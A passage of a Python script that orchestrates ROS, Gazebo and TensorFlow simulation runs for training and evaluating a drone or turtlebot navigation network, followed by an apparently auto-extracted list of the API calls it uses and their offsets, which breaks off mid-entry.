parser.add_argument("--data_root", default='pilot_data/', type=str, help="Choose the directory to which tensorflow should save the summaries.")
parser.add_argument("--code_root", default='~', type=str, help="Choose the directory to which tensorflow should save the summaries.")
parser.add_argument("-t", "--log_tag", default='testing_on_policy', type=str, help="LOGTAG: tag used to name logfolder.")
parser.add_argument("--data_location", default='', type=str, help="Datalocation is by default the log_tag but than in data_root instead of summary_dir, otherwise FLAG should indicate relative path to data_root.")
parser.add_argument("-n", "--number_of_runs", default=-1, type=int, help="NUMBER_OF_RUNS: define the number of runs the robot will be trained/evaluated. n=1 avoids a hard stop after 5minutes.")
parser.add_argument("-g", "--graphics", action='store_true', help="Add extra nodes for visualization e.g.: Gazebo GUI, control display, depth prediction, ...")
parser.add_argument("-e", "--evaluation", action='store_true',help="This script can launch 2 modes of experiments: training (default) or evaluation.")
parser.add_argument("--evaluate_every", default=10, type=int, help="Evaluate every N runs when training.")
parser.add_argument("--final_evaluation_runs", default=5, type=int, help="Evaluate N times after training is finished..")
parser.add_argument("-ds", "--create_dataset", action='store_true',help="In case of True, sensor data is saved.")
parser.add_argument("--owr", action='store_true',help="Delete dataset if it is already there.")
parser.add_argument("--save_only_success", action='store_true',help="In case of True, sensor data is saved.")
parser.add_argument("--random_seed", type=int, help="If provided, the simulation is seeded (as good as possible).")
# ==========================
# Robot Settings
# ==========================
parser.add_argument("--robot",default='drone_sim', type=str, help="Specify the robot configuration file: turtle_sim(default), drone_sim, turtle_real, drone_real.")
parser.add_argument("-r", "--recovery", action='store_true',help="Use drone with recovery camera's attached.")
# ==========================
# Tensorflow Settings
# ==========================
parser.add_argument("-m","--checkpoint_path", type=str, help="Specify the directory of the checkpoint of the earlier trained model.")
parser.add_argument("-pe","--python_environment",default='sing', type=str, help="Define which environment should be loaded in shell when launching tensorlfow. Possibilities: sing, docker, virtualenv.")
parser.add_argument("-pp","--python_project",default='pytorch_pilot/pilot', type=str, help="Define which python module should be started with ~/tenorflow/PROJECT_NAME/main.py: q-learning/pilot, pilot/pilot, ddpg, ....")
# ==========================
# Environment Settings
# ==========================
parser.add_argument("--auto_go", action='store_true',help="Publish /go signal after few launching gazebo to start experiment automatically")
parser.add_argument("--reuse_default_world", action='store_true',help="reuse the default forest/canyon/sandbox instead of generating them on the fly.")
parser.add_argument("--one_world", action='store_true',help="Reuse one world to train in over and over again.")
parser.add_argument("-w","--world",dest='worlds', action='append', nargs=1, help="Define different worlds: corridor, canyon, forest, sandbox, esat_v1, esat_v2, ... .")
# parser.add_argument("-p","--paramfile",default='eva_params.yaml',type=str, help="Add more parameters to the command loading the DNN in tensorflow ex: eva_params.yaml or params.yaml.")
parser.add_argument("--fsm",default='nn_drone_fsm',type=str, help="Define the fsm loaded from /simsup/config/fsm: nn_turtle_fsm, console_fsm, console_nn_db_turtle_fsm, ...")
parser.add_argument("--x_pos",default=999,type=float, help="Specify x position.")
parser.add_argument("--x_var",default=0,type=float, help="Specify variation in x position.")
parser.add_argument("--y_pos",default=999,type=float, help="Specify y position.")
parser.add_argument("--y_var",default=0,type=float, help="Specify variation in y position.")
parser.add_argument("--z_pos",default=999,type=float, help="Specify z position.")
parser.add_argument("--z_var",default=0,type=float, help="Specify variation z position.")
parser.add_argument("--yaw_or",default=999,type=float, help="Specify yaw orientation.")
# parser.add_argument("--yaw_var",default=2*3.14,type=float, help="Specify variation in yaw orientation.")
parser.add_argument("--yaw_var",default=0,type=float, help="Specify variation in yaw orientation.")
FLAGS, others = parser.parse_known_args()
# FLAGS=parser.parse_args()
# get simulation_supervised dir
simulation_supervised_dir=subprocess.check_output(shlex.split("rospack find simulation_supervised"))[:-1]
# 3 main directories have to be defined in order to make it also runnable from a read-only system-installed singularity image.
if FLAGS.summary_dir[0] != '/': # 1. Tensorflow log directory for saving tensorflow logs and xterm logs
FLAGS.summary_dir=os.environ['HOME']+'/'+FLAGS.summary_dir
if FLAGS.data_root[0] != '/': # 2. Pilot_data directory for saving data
FLAGS.data_root=os.environ['HOME']+'/'+FLAGS.data_root
if FLAGS.code_root == '~': # 3. location for tensorflow code (and also catkin workspace though they are found with rospack)
#no explicit directory for code is set so try to parse first from environment
try:
FLAGS.code_root = os.environ['CODE']
except KeyError: # in case environment variable is not set, take home dir
FLAGS.code_root = os.environ['HOME']
if FLAGS.log_tag == 'testing_on_policy':
if os.path.isdir(FLAGS.summary_dir+FLAGS.log_tag): shutil.rmtree(FLAGS.summary_dir+FLAGS.log_tag)
if os.path.isdir(FLAGS.data_root+FLAGS.log_tag): shutil.rmtree(FLAGS.data_root+FLAGS.log_tag)
# add default values to be able to operate
if FLAGS.worlds == None : FLAGS.worlds=['canyon']
else: #worlds are appended in a nested list... so get them out.
worlds=[]
for w in FLAGS.worlds: worlds.append(w[0])
FLAGS.worlds = worlds[:]
# FLAGS.params=load_param_file(FLAGS.paramfile) if FLAGS.paramfile else ""
FLAGS.params=others[:]
if FLAGS.random_seed:
np.random.seed(FLAGS.random_seed)
FLAGS.params.append('--random_seed '+str(FLAGS.random_seed))
# check if robot configuration exists is there:
if not os.path.isfile(simulation_supervised_dir+'/config/robot/'+FLAGS.robot+'.yaml'):
myprint("Could not find robot configuration for {}".format(w[0]))
sys.exit(4)
# try to extract condor host
try:
FLAGS.condor_host=subprocess.check_output(shlex.split("cat $_CONDOR_JOB_AD | grep RemoteHost | head -1 | cut -d '=' -f 2 | cut -d '@' -f 2 | cut -d '.' -f 1)"))
except:
FLAGS.condor_host='unknown_host'
# Clear log folder if desired
if FLAGS.owr and os.path.isdir("{0}{1}".format(FLAGS.summary_dir, FLAGS.log_tag)):
shutil.rmtree("{0}{1}".format(FLAGS.summary_dir, FLAGS.log_tag))
# Create main log folder if necessary
if not os.path.isdir("{0}{1}".format(FLAGS.summary_dir, FLAGS.log_tag)):
os.makedirs("{0}{1}".format(FLAGS.summary_dir, FLAGS.log_tag))
else:
# Load last position to start from if lastposition is file log folder already existed
if os.path.isfile("{0}{1}/last_position.txt".format(FLAGS.summary_dir, FLAGS.log_tag)):
try:
with open("{0}{1}/last_position.txt".format(FLAGS.summary_dir, FLAGS.log_tag),'r') as f:
last_position=f.readlines()
FLAGS.x_pos,FLAGS.y_pos,FLAGS.z_pos,FLAGS.yaw_or= [ float(x) for x in last_position[-1].strip().split(',')]
myprint("[run_script] obtained last position as {0} {1} {2} {3}".format(FLAGS.x_pos,FLAGS.y_pos,FLAGS.z_pos,FLAGS.yaw_or))
except:
myprint("[run_script] failed to obtain last position from {0}{1}/last_position.txt".format(FLAGS.summary_dir, FLAGS.log_tag))
# in case of data_creation, make data_location in ~/pilot_data
if FLAGS.create_dataset:
if FLAGS.data_location == "":
FLAGS.data_location = "{0}{1}".format(FLAGS.data_root, FLAGS.log_tag)
else:
FLAGS.data_location = "{0}{1}".format(FLAGS.data_root, FLAGS.data_location)
if os.path.isdir(FLAGS.data_location) and (FLAGS.number_of_runs == 1 or FLAGS.owr):
shutil.rmtree(FLAGS.data_location)
if not os.path.isdir(FLAGS.data_location):
os.makedirs(FLAGS.data_location)
else:
# check number of items already recorded
if len(os.listdir(FLAGS.data_location)) >= 1:
# in case there is already data recorded, parse the number of runs and continue from there
last_run=sorted([d for d in os.listdir(FLAGS.data_location) if os.path.isdir("{0}/{1}".format(FLAGS.data_location,d))])[-1]
run_number=int(last_run.split('_')[0]) +1 #assuming number occurs at first 5 digits xxxxx_name_of_data
myprint("Found data from previous run so adjusted run_number to {}".format(run_number))
# display and save all settings
myprint("\nSettings:")
for f in sorted(FLAGS.__dict__): myprint("{0}: {1}".format( f, FLAGS.__dict__[f]))
with open("{0}{1}/run_conf".format(FLAGS.summary_dir, FLAGS.log_tag),'w') as c:
c.write("Settings of Run_simulation_scripts:\n\n")
for f in FLAGS.__dict__: c.write("{0}: {1}\n".format(f, FLAGS.__dict__[f]))
##########################################################################################################################
# STEP 2 Start ROS with ROBOT specific parameters
# ensure location for logging the xterm outputs exists.
ros_xterm_log_dir="{0}{1}/xterm_ros".format(FLAGS.summary_dir,FLAGS.log_tag)
if not os.path.isdir(ros_xterm_log_dir): os.makedirs(ros_xterm_log_dir)
def start_ros():
"""Start ros core with robot parameters loaded"""
global ros_popen
command="roslaunch simulation_supervised load_params.launch robot_config:={0}.yaml {1}".format(FLAGS.robot, 'random_seed:='+str(FLAGS.random_seed) if FLAGS.random_seed else '')
if os.path.isfile(simulation_supervised_dir+'/config/environment/'+worlds[0]+'.yaml'):
command="{0} world_config:={1}".format(command, simulation_supervised_dir+'/config/environment/'+worlds[0]+'.yaml')
xterm_log_file='{0}/xterm_ros_{1}.txt'.format(ros_xterm_log_dir,time.strftime("%Y-%m-%d_%I%M"))
if os.path.isfile(xterm_log_file): os.remove(xterm_log_file)
args = shlex.split("xterm -iconic -l -lf {0} -hold -e {1}".format(xterm_log_file,command))
ros_popen = subprocess.Popen(args)
pid_ros = ros_popen.pid
myprint("{0}: start_ros pid {1}\n".format(time.strftime("%Y-%m-%d_%I:%M:%S"),pid_ros))
wait_for_ros_to_start()
rospy.set_param('evaluate_every',FLAGS.evaluate_every if not FLAGS.evaluation else 1)
rospy.set_param('recovery',FLAGS.recovery)
start_ros()
##########################################################################################################################
# STEP 3 Start tensorflow
python_xterm_log_dir="{0}{1}/xterm_python".format(FLAGS.summary_dir,FLAGS.log_tag)
if not os.path.isdir(python_xterm_log_dir): os.makedirs(python_xterm_log_dir)
def start_python():
"""Function that initializes python code."""
# delete default test folder
# if logdir already exists probably condor job is just restarted somewhere so use last saved q in case of training
global python_popen
# Add parameters
FLAGS.log_folder = "{0}{1}".format(FLAGS.summary_dir,FLAGS.log_tag)
FLAGS.params.append("--log_tag {0}".format(FLAGS.log_tag))
if not '--on_policy' in FLAGS.params: FLAGS.params.append("--on_policy")
if FLAGS.checkpoint_path: FLAGS.params.append("--checkpoint_path {0}".format(FLAGS.checkpoint_path))
# Create command
params=""
for p in FLAGS.params: params="{0} {1}".format(params,p)
command="{0}/scripts/launch_python/{1}.sh {2}/tensorflow/{3}/main.py {4}".format(simulation_supervised_dir,
FLAGS.python_environment,
FLAGS.code_root,
FLAGS.python_project,
params)
myprint("Tensorflow command:\n {}".format(command))
xterm_log_file='{0}/xterm_python_{1}.txt'.format(python_xterm_log_dir,time.strftime("%Y-%m-%d_%I%M"))
if os.path.isfile(xterm_log_file): os.remove(xterm_log_file)
args = shlex.split("xterm -l -lf {0} -hold -e {1}".format(xterm_log_file, command))
# Execute command
python_popen = subprocess.Popen(args)
pid_python = python_popen.pid
myprint("{0}: start_python pid {1} \n\n".format(time.strftime("%Y-%m-%d_%I:%M:%S"),pid_python))
# Wait for creation of tensorflow log file to know the python node is running
start_time = time.time()
wait_time=10
if os.path.isfile(FLAGS.log_folder+'/nn_ready'):
prev_stat_nn_ready=subprocess.check_output(shlex.split("stat -c %Y "+FLAGS.log_folder+'/nn_ready'))
while prev_stat_nn_ready == subprocess.check_output(shlex.split("stat -c %Y "+FLAGS.log_folder+'/nn_ready')):
if time.time()-start_time > wait_time*60:
myprint("{0}: Waited for {3}minutes on nn_ready in {2} to start, seems like tensorflow has crashed on {1} so exit with error code 2.".format(time.strftime("%Y-%m-%d_%I:%M"), FLAGS.condor_host, FLAGS.log_folder, wait_time))
kill_combo()
sys.exit(2)
time.sleep(1)
else:
while(not os.path.isfile(FLAGS.log_folder+'/nn_ready')):
time.sleep(1)
if time.time()-start_time > wait_time*60:
myprint("{0}: Waited for {3}minutes on nn_ready in {2} to start, seems like tensorflow has crashed on {1} so exit with error code 2.".format(time.strftime("%Y-%m-%d_%I:%M"), FLAGS.condor_host, FLAGS.log_folder, wait_time))
kill_combo()
sys.exit(2)
start_python()
myprint("[runscript] set recovery to {0}".format(rospy.get_param('recovery')))
##########################################################################################################################
# STEP 4 Start gazebo environment
def create_environment(run_number, world_name):
"""Call correct python script for generating potentially new environment.
Returns a string with arguments for the launch file to be concatenated to the launch command.
"""
# generate world if it is possible and allowed, this also changes the loaded world file location from the default simsup_demo/worlds to log_folder
world_file=''
world_config=''
background=''
# don't create a new world if one_world is on
if FLAGS.one_world and run_number > 0: return ''
if world_name in ['canyon', 'forest', 'sandbox'] and not FLAGS.reuse_default_world:
generator_file="{0}/python/generators/{1}_generator.py".format(subprocess.check_output(shlex.split("rospack find simulation_supervised_tools"))[:-1],world_name)
subprocess.Popen(shlex.split("python "+generator_file+" "+FLAGS.log_folder)).wait()
background=FLAGS.log_folder+'/'+world_name+'.png'
world_file=FLAGS.log_folder+'/'+world_name+'.world'
elif world_name in ['canyon', 'corridor', 'different_corridor'] and FLAGS.reuse_default_world:
# reuse default 10 evaluation canyons or corridors
world_file='{0}/../simulation_supervised_demo/worlds/{2}_evaluation/{1:05d}_{2}.world'.format(simulation_supervised_dir,run_number%10, world_name)
background='{0}/../simulation_supervised_demo/worlds/{2}_evaluation/{1:05d}_{2}.png'.format(simulation_supervised_dir,run_number%10, world_name)
if 'corridor' in world_name:
command="{0} world_config:={1}/config/environment/{2:05d}_{3}.yaml".format(command, simulation_supervised_dir,run_number%10, world_name)
elif world_name in ['corridor'] and not FLAGS.reuse_default_world:
generator_file="{0}/python/generators/world_generator.py".format(subprocess.check_output(shlex.split("rospack find simulation_supervised_tools"))[:-1])
generator_command="python "+generator_file+" --output_dir "+FLAGS.log_folder+" --output_file "+world_name+"_"+str(run_number)
for p in others: generator_command="{0} {1}".format(generator_command, p)
print("[runscript] Generate command: {0}".format(generator_command))
return_val=subprocess.call(shlex.split(generator_command))
if return_val != 0:
kill_combo()
myprint("Failed to create env {0}, return value: {1}".format(world_name, return_val))
sys.exit(2)
world_file=FLAGS.log_folder+'/'+world_name+"_"+str(run_number)+'.world'
world_config=FLAGS.log_folder+'/'+world_name+"_"+str(run_number)+'.yaml'
arguments='world_name:='+world_name
for arg in ["world_file", "world_config", "background"]:
if len(eval(arg)) != 0: arguments=arguments+" "+arg+":="+eval(arg)
return arguments
def sample_new_position(starting_positions=[]):
""" Parse a new x,y,z,yaw(quaternion) pose for the robot given the world name and current robot
returns positions: x, y, z and orientation yaw in quaternion (1 ~ +90)
"""
# default with arguments
x, y, z, yaw = 0,0,0,0
if len(starting_positions) != 0:
pos = starting_positions[np.random.choice(range(len(starting_positions)))]
if len(pos) == 2:
x, y = pos
elif len(pos) == 3:
x, y, yaw = pos
elif len(pos) == 4:
x, y, z, yaw = pos
else:
myprint("[run_script] failed to parse starting_position {0}".format(pos))
# overwrite sampled starting positions if they were manually set
if FLAGS.x_pos != 999: x=FLAGS.x_pos
if FLAGS.y_pos != 999: y=FLAGS.y_pos
if FLAGS.z_pos != 999: z=FLAGS.z_pos
if FLAGS.yaw_or != 999: yaw=FLAGS.yaw_or
# add some variation
x += np.random.uniform(-FLAGS.x_var,FLAGS.x_var)
y += np.random.uniform(-FLAGS.y_var,FLAGS.y_var)
z += np.random.uniform(-FLAGS.z_var,FLAGS.z_var)
yaw += np.random.uniform(-FLAGS.yaw_var,FLAGS.yaw_var)
return x, y, z, yaw
# ensure location for logging the xterm outputs exists.
gazebo_xterm_log_dir="{0}{1}/xterm_gazebo".format(FLAGS.summary_dir,FLAGS.log_tag)
if not os.path.isdir(gazebo_xterm_log_dir): os.makedirs(gazebo_xterm_log_dir)
# Some local variables for running different simulations
prev_environment_arguments=''
reset_gazebo_service=rospy.ServiceProxy('/gazebo/reset_simulation',Emptyservice)
model_state_gazebo_service=rospy.ServiceProxy('/gazebo/set_model_state',SetModelState)
unpause_physics_client=rospy.ServiceProxy('/gazebo/unpause_physics',Emptyservice)
gazebo_popen=None
prev_stat_nn_log=''
prev_stat_fsm_log=''
fsm_file = FLAGS.log_folder+'/fsm_log'
if not os.path.isfile(fsm_file):
with open(fsm_file,'a') as f:
f.write('{0}: {1}\n'.format(time.strftime("%Y-%m-%d_%I-%M-%S"), FLAGS.log_folder))
crashed=False
while (run_number < FLAGS.number_of_runs) or FLAGS.number_of_runs==-1:
######################################
# 4.1 Prepare Run
world_name = FLAGS.worlds[run_number%len(FLAGS.worlds)]
# save current status of NN nn_ready to compare afterwards
if os.path.isfile(FLAGS.log_folder+'/nn_ready'):
prev_stat_nn_log=subprocess.check_output(shlex.split("stat -c %Y "+FLAGS.log_folder+'/nn_ready'))
else: # we have last communication with our log folder so exit with code 2
myprint("{2}: lost communication with our log folder {0} on host {1} so exit with code 3.".format(FLAGS.log_folder, FLAGS.condor_host, time.strftime("%Y-%m-%d_%I:%M:%S")))
kill_combo()
sys.exit(3)
# clean up gazebo ros folder every now and then
if run_number%50 == 0 : shutil.rmtree("{0}/.gazebo/log".format(os.environ['HOME']),ignore_errors=True)
evaluate=((run_number%FLAGS.evaluate_every) == 0 and run_number != 0 and FLAGS.evaluate_every != -1) or FLAGS.evaluation
# if evaluate:
# rospy.set_param('max_duration', 120)
# else:
# rospy.set_param('max_duration', 5)
new_environment_arguments=create_environment(run_number, world_name)
######################################
# 4.2 Create environment and perform next run
if rospy.has_param('/starting_positions'):
starting_positions = rospy.get_param('starting_positions')
if isinstance(starting_positions,str):
starting_positions=ast.literal_eval(starting_positions)
else:
starting_positions = []
if (new_environment_arguments == prev_environment_arguments or len(new_environment_arguments) == 0) and not crashed and gazebo_popen != None:
# 4.2.1 Reset environment for next run if possible
# 4.2.1a Ensure correct settings
rospy.set_param('/evaluate',evaluate)
# 4.2.1b Reset environment ==> causes gt_node to freeze for more than a minute...
# reset_gazebo_service(EmptyRequest())
# 4.2.1c Change position of drone according to new selected starting position
pose=Pose()
pose.position.x, pose.position.y, starting_height, yaw = sample_new_position(starting_positions)
# pose.position.x, pose.position.y, starting_height, yaw=0,0,1,0
myprint("[run_script]: x: {0}, y: {1}, z: {2}, yaw:{3}".format(pose.position.x, pose.position.y, starting_height, yaw))
# some yaw to quaternion re-orientation code:
pose.orientation.z=np.sin(yaw)
pose.orientation.w=np.cos(yaw)
pose.position.z = 0.1
model_state = ModelState()
model_state.model_name = 'quadrotor' if FLAGS.robot.startswith('drone') else 'turtlebot3_burger'
model_state.pose=pose
state_request = SetModelStateRequest()
state_request.model_state = model_state
retvals = model_state_gazebo_service(state_request)
rospy.set_param('starting_height', starting_height)
myprint("Changed pose with return values: {0}".format(retvals))
time.sleep(5) # HAS to be 5 otherwise '/overtake' and '/ready' overlap resulting in empty images in gt_listener
unpause_physics_client(EmptyRequest())
else:
# 4.2.2 Launch Gazebo again
# 4.2.2a Ensure previous Gazebo is not running anymore
if gazebo_popen!=None:
kill_popen('gazebo', gazebo_popen)
wait_for_gazebo()
prev_environment_arguments = new_environment_arguments
# 4.2.2b Build command with correct settings
# remove if saving location already exists (probably due to crash previously)
if FLAGS.create_dataset:
data_location="{0}/{1:05d}_{2}".format(FLAGS.data_location,run_number,world_name)
if os.path.isdir(data_location): shutil.rmtree(data_location)
os.makedirs(data_location)
new_environment_arguments+=" save_images:=true"
new_environment_arguments+=" data_location:={0}".format(data_location)
if 'world_file' in new_environment_arguments:
world_file=[a for a in new_environment_arguments.split(' ') if 'world_file' in a][0].split(':=')[1]
myprint("[runscript] world_file {0}".format(world_file))
shutil.copyfile(world_file, data_location+'/'+os.path.basename(world_file))
x,y,z,yaw=sample_new_position(starting_positions)
# x,y,z,yaw=-54, -4, 1, -3.14
command="roslaunch simulation_supervised_demo {0}.launch fsm_config:={1} log_folder:={2} evaluate:={3} {4} graphics:={5} x:={6} y:={7} Yspawned:={9} starting_height:={8} {10}".format(FLAGS.robot,
FLAGS.fsm,
FLAGS.log_folder,
'true' if evaluate else 'false',
new_environment_arguments,
'true' if FLAGS.graphics else 'false',
x,y,z,yaw,
'random_seed:='+str(FLAGS.random_seed) if FLAGS.random_seed else '')
# 4.2.2c Launch command
# Execute command
myprint( "gazebo_command: {0}".format(command))
xterm_log_file='{0}/xterm_gazebo_{1}.txt'.format(gazebo_xterm_log_dir,time.strftime("%Y-%m-%d_%I-%M-%S"))
args = shlex.split("xterm -iconic -l -lf {0} -hold -e {1}".format(xterm_log_file,command))
gazebo_popen = subprocess.Popen(args)
pid_gazebo = gazebo_popen.pid
######################################
# 4.3 Wait for run to finish
# on this moment the run is not crashed (yet).
crashed=False
crash_checked=False
#print starting positions for visualizing later.
with open(FLAGS.log_folder+'/starting_positions.txt','a') as f:
f.write('{0}, {1}, {2}\n'.format(x,y,yaw))
prev_stat_fsm_log=subprocess.check_output(shlex.split("stat -c %Y "+fsm_file))
time.sleep(0.1)
myprint("\n{0}: started run {1} of the {2} in {4} {3} {5}".format(time.strftime("%Y-%m-%d_%I:%M:%S"),
run_number+1,
FLAGS.number_of_runs,
world_name,
bcolors.OKBLUE,
bcolors.ENDC))
start_time=time.time()
time_spend=0
# while fsm_file has not been updated, wait...
while prev_stat_fsm_log == subprocess.check_output(shlex.split("stat -c %Y "+fsm_file)):
# Check on job suspension:
# if between last update and now has been more than 30 seconds (should be less than 0.1s)
if time.time() - start_time - time_spend > 30:
myprint("{0}: Job got suspended.".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
time.sleep(30) #wait for big tick to update
start_time=time.time()
else:
time_spend=time.time() - start_time
# automatically start with /go after 10s
if FLAGS.auto_go:
if 10.05 <= time_spend<10.15:
go_popen=subprocess.Popen(shlex.split("rostopic pub /go std_msgs/Empty"))
elif 11.15 <= time_spend < 11.25 and go_popen.poll()==None:
kill_popen('go', go_popen)
# if False:
# if time_spend > 60*10 and FLAGS.number_of_runs != 1: #don't interupt if this is a single run
if time_spend > 5 and not crash_checked:
crash_checked = True
# check for crash
with open(xterm_log_file, 'r') as f:
for l in f.readlines():
if 'process has died' in l:
myprint("[run_script] {0}: found gz crash in {1}: {2}.".format(time.strftime("%Y-%m-%d_%I:%M:%S"), os.path.basename(xterm_log_file),l[:50]))
crashed=True
crash_number+=1
if crashed:
if crash_number < 10: #after 20 crashes its maybe time to restart everything
kill_popen('gazebo', gazebo_popen)
else:
myprint("{0}: crashed for 10the time so restart everything.".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
kill_combo()
start_ros()
start_python()
crash_number = 0
break # get out of this loop
time.sleep(0.1)
######################################
# 4.4 Clean up run
# 4.4.1 Wait for NN framework if it is running
if not crashed and 'nn' in FLAGS.fsm:
# wait for nn_ready and stop in case of no tensorflow communication
if os.path.isfile(FLAGS.log_folder+'/nn_ready'):
current_stat=subprocess.check_output(shlex.split("stat -c %Y "+FLAGS.log_folder+'/nn_ready'))
start_time=time.time()
myprint("{0}: waiting for nn_ready.".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
while current_stat == prev_stat_nn_log:
current_stat=subprocess.check_output(shlex.split("stat -c %Y "+FLAGS.log_folder+'/nn_ready'))
time.sleep(1)
if time.time()-start_time > 8*60:
myprint("{0}: waited for 8minutes on nn_ready to finish training so something went wrong on {1} exit with code 2.".format(time.strftime("%Y-%m-%d_%I:%M:%S"), FLAGS.condor_host))
kill_combo()
sys.exit(2)
else:
myprint("{2}: we have lost communication with our log folder {0} on host {1} so exit with code 3.".format(FLAGS.log_folder, FLAGS.condor_host, time.strftime("%Y-%m-%d_%I:%M:%S")))
kill_combo()
sys.exit(3)
if not crashed:
message = open(fsm_file,'r').readlines()[-1].strip()
myprint("{0}: ended run {1} with {3}{2}{4}".format(time.strftime("%Y-%m-%d_%I:%M:%S"), run_number+1, message, bcolors.OKGREEN if 'success' in message else bcolors.FAIL, bcolors.ENDC))
# increment also in case of crash as drone has zero turning speed:
run_number+=1
if message == 'FINISHED': # make this the final run for evaluation
FLAGS.number_of_runs=run_number+FLAGS.final_evaluation_runs
FLAGS.evaluation=True
# run_number = FLAGS.number_of_runs-1
time.sleep(3)
# extra second needed to save image in gt_listener
# after all required runs are finished
kill_combo()
myprint("\n{0}: done.".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
|
[
"shlex.split",
"yaml.load",
"time.sleep",
"sys.exit",
"numpy.sin",
"geometry_msgs.msg.Pose",
"os.remove",
"os.listdir",
"argparse.ArgumentParser",
"subprocess.Popen",
"rospy.ServiceProxy",
"os.path.isdir",
"subprocess.call",
"numpy.random.seed",
"gazebo_msgs.srv.SetModelStateRequest",
"rospy.get_param",
"rospy.has_param",
"rospy.set_param",
"os.path.isfile",
"gazebo_msgs.msg.ModelState",
"ast.literal_eval",
"numpy.random.uniform",
"numpy.cos",
"time.time",
"std_srvs.srv.EmptyRequest",
"os.makedirs",
"time.strftime",
"os.path.basename",
"shutil.rmtree"
] |
[((5271, 5653), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Run_simulation_scripts governs the running of long gazebo_ros_tensorflow simulations.\n The core functionality lies in:\n 1. parsing the correct arguments at different levels (tensorflow dnn, gazebo environment, ros supervision)\n 2. different crash handling when for instance starting gazebo / tensorflow fails"""'}), '(description=\n """Run_simulation_scripts governs the running of long gazebo_ros_tensorflow simulations.\n The core functionality lies in:\n 1. parsing the correct arguments at different levels (tensorflow dnn, gazebo environment, ros supervision)\n 2. different crash handling when for instance starting gazebo / tensorflow fails"""\n )\n', (5294, 5653), False, 'import argparse\n'), ((24021, 24081), 'rospy.ServiceProxy', 'rospy.ServiceProxy', (['"""/gazebo/reset_simulation"""', 'Emptyservice'], {}), "('/gazebo/reset_simulation', Emptyservice)\n", (24039, 24081), False, 'import rospy\n'), ((24108, 24168), 'rospy.ServiceProxy', 'rospy.ServiceProxy', (['"""/gazebo/set_model_state"""', 'SetModelState'], {}), "('/gazebo/set_model_state', SetModelState)\n", (24126, 24168), False, 'import rospy\n'), ((24191, 24250), 'rospy.ServiceProxy', 'rospy.ServiceProxy', (['"""/gazebo/unpause_physics"""', 'Emptyservice'], {}), "('/gazebo/unpause_physics', Emptyservice)\n", (24209, 24250), False, 'import rospy\n'), ((2953, 3008), 'subprocess.Popen', 'subprocess.Popen', (["['ps', '-ef']"], {'stdout': 'subprocess.PIPE'}), "(['ps', '-ef'], stdout=subprocess.PIPE)\n", (2969, 3008), False, 'import subprocess, shlex\n'), ((3020, 3095), 'subprocess.Popen', 'subprocess.Popen', (["['grep', 'gz']"], {'stdin': 'p_ps.stdout', 'stdout': 'subprocess.PIPE'}), "(['grep', 'gz'], stdin=p_ps.stdout, stdout=subprocess.PIPE)\n", (3036, 3095), False, 'import subprocess, shlex\n'), ((3440, 3453), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (3450, 3453), False, 'import time\n'), ((3574, 3629), 'subprocess.Popen', 'subprocess.Popen', (["['ps', '-ef']"], {'stdout': 'subprocess.PIPE'}), "(['ps', '-ef'], stdout=subprocess.PIPE)\n", (3590, 3629), False, 'import subprocess, shlex\n'), ((3641, 3733), 'subprocess.Popen', 'subprocess.Popen', (["['grep', 'create_dataset']"], {'stdin': 'p_ps.stdout', 'stdout': 'subprocess.PIPE'}), "(['grep', 'create_dataset'], stdin=p_ps.stdout, stdout=\n subprocess.PIPE)\n", (3657, 3733), False, 'import subprocess, shlex\n'), ((4224, 4237), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4234, 4237), False, 'import time\n'), ((4247, 4308), 'subprocess.call', 'subprocess.call', (["['rosparam', 'list']"], {'stdout': 'subprocess.PIPE'}), "(['rosparam', 'list'], stdout=subprocess.PIPE)\n", (4262, 4308), False, 'import subprocess, shlex\n'), ((5095, 5108), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (5105, 5108), False, 'import time\n'), ((11536, 11584), 'os.path.isdir', 'os.path.isdir', (['(FLAGS.summary_dir + FLAGS.log_tag)'], {}), '(FLAGS.summary_dir + FLAGS.log_tag)\n', (11549, 11584), False, 'import sys, os, os.path\n'), ((11640, 11686), 'os.path.isdir', 'os.path.isdir', (['(FLAGS.data_root + FLAGS.log_tag)'], {}), '(FLAGS.data_root + FLAGS.log_tag)\n', (11653, 11686), False, 'import sys, os, os.path\n'), ((12099, 12132), 'numpy.random.seed', 'np.random.seed', (['FLAGS.random_seed'], {}), '(FLAGS.random_seed)\n', (12113, 12132), True, 'import numpy as np\n'), ((12252, 12340), 'os.path.isfile', 'os.path.isfile', (["(simulation_supervised_dir + '/config/robot/' + FLAGS.robot + '.yaml')"], {}), "(simulation_supervised_dir + '/config/robot/' + FLAGS.robot +\n '.yaml')\n", (12266, 12340), False, 'import sys, os, os.path\n'), ((12402, 12413), 'sys.exit', 'sys.exit', (['(4)'], {}), '(4)\n', (12410, 12413), False, 'import sys, os, os.path\n'), ((15421, 15453), 'os.path.isdir', 'os.path.isdir', (['ros_xterm_log_dir'], {}), '(ros_xterm_log_dir)\n', (15434, 15453), False, 'import sys, os, os.path\n'), ((15455, 15485), 'os.makedirs', 'os.makedirs', (['ros_xterm_log_dir'], {}), '(ros_xterm_log_dir)\n', (15466, 15485), False, 'import sys, os, os.path\n'), ((15759, 15852), 'os.path.isfile', 'os.path.isfile', (["(simulation_supervised_dir + '/config/environment/' + worlds[0] + '.yaml')"], {}), "(simulation_supervised_dir + '/config/environment/' + worlds[\n 0] + '.yaml')\n", (15773, 15852), False, 'import sys, os, os.path\n'), ((16066, 16096), 'os.path.isfile', 'os.path.isfile', (['xterm_log_file'], {}), '(xterm_log_file)\n', (16080, 16096), False, 'import sys, os, os.path\n'), ((16231, 16253), 'subprocess.Popen', 'subprocess.Popen', (['args'], {}), '(args)\n', (16247, 16253), False, 'import subprocess, shlex\n'), ((16397, 16488), 'rospy.set_param', 'rospy.set_param', (['"""evaluate_every"""', '(FLAGS.evaluate_every if not FLAGS.evaluation else 1)'], {}), "('evaluate_every', FLAGS.evaluate_every if not FLAGS.\n evaluation else 1)\n", (16412, 16488), False, 'import rospy\n'), ((16487, 16530), 'rospy.set_param', 'rospy.set_param', (['"""recovery"""', 'FLAGS.recovery'], {}), "('recovery', FLAGS.recovery)\n", (16502, 16530), False, 'import rospy\n'), ((16785, 16820), 'os.path.isdir', 